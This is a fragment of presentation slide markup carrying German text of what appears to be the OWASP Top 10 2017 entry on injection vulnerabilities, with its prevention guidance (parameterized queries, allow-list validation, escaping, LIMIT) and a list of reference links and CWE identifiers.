                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ist u.a. bei der Verwendung von SQL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NoSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, ORM-Frameworks, Betriebssystem-Kommandos, LDAP, Expression Language (EL) , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Graph Navigation Language (OGNL) oder XML zu finden. Das Grundkonzept eines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-Angriffs ist für alle Interpreter gleich. Ein Quellcode Review ist eine sehr gute Methode, um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-Schwachstellen zu finden, dicht gefolgt vom gründlichen (ggf. automatisierten) Testen aller Parameter und Variablen wie z.B. Eingabe-Felder und Header-, URL-, Cookies-, JSON-, SOAP- und XML-Eingaben. Statische (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, Quellcode-Ebene) und dynamische (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, laufende Anwendung) Test-Werkzeuge können von Organisationen für ihre CI/CD-Pipeline genutzt werden, um neue Schwachstellen noch vor einer möglichen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Produktivnahme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> aufzuspüren.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Referenzen</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u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId6"/>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Parameterize Queries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ASVS: V5 Input Validation and Encoding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Testing Guide: SQL Injection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10"/>
              </a:rPr>
              <a:t>Command Injection</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1"/>
              </a:rPr>
              <a:t>ORM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Cheat Sheet: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Cheat Sheet: SQL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OWASP Cheat Sheet: Injection Prevention in Java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OWASP Cheat Sheet: Query Parameterization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OWASP Automated Threats to Web Applications – OAT-014</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300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Andere</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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8"/>
              </a:rPr>
              <a:t>CWE-77: Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>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9"/>
              </a:rPr>
              <a:t>CWE-89: SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>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0"/>
              </a:rPr>
              <a:t>CWE-564: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>Hibernate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>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1"/>
              </a:rPr>
              <a:t>CWE-917: Expression Language </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t>PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t>: Server-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t>side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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Wie kann ich das verhindern?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> zu verhindern, müssen Eingabedaten und Kommandos (bzw. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Querys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) konsequent getrennt bleiben.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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Die besten Methoden dafür sind entweder eine sichere API, die die direkte Interpreter-Nutzung vollständig vermeidet, bzw. die eine parametrisierte, typgebundene Schnittstelle anbietet oder die korrekte Verwendung eines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ORM-Frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anmerkung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> können - auch parametrisiert - immer noch SQL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ermöglichen, wenn PL/SQL oder </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T-SQL Anfragen und Eingabedaten </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>konkateniert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> oder mit EXECUTE IMMEDIATE oder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>() ausgeführt werden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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Für die serverseitige Eingabe-Validierung empfiehlt sich die Nutzung eines Positivlisten(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Whitelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”)-Ansatzes. Dies ist i.A. kein vollständiger Schutz, da viele Anwendungen Sonder- und Meta-Zeichen z.B. für Textfelder oder Mobile Apps benötigen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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Für jede noch verbliebene dynamische Query müssen Sonder- und Meta-Zeichen für den jeweiligen Interpreter mit der richtigen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-Syntax entschärft werden. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anmerkung:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Ein </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> von SQL-Bezeichnern, wie z.B. die Namen von Tabellen oder Spalten usw. ist nicht möglich.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Falls Nutzer solche Bezeichner selbst eingeben können, so ist dies durchaus gefährlich. Dies ist eine übliche Schwachstelle bei Software, die Reports aus einer Datenbank erstellt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Querys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> sollten LIMIT oder andere SQL-Controls verwenden, um den möglichen Massen-Abfluss von Daten zu verhindern.</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A1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
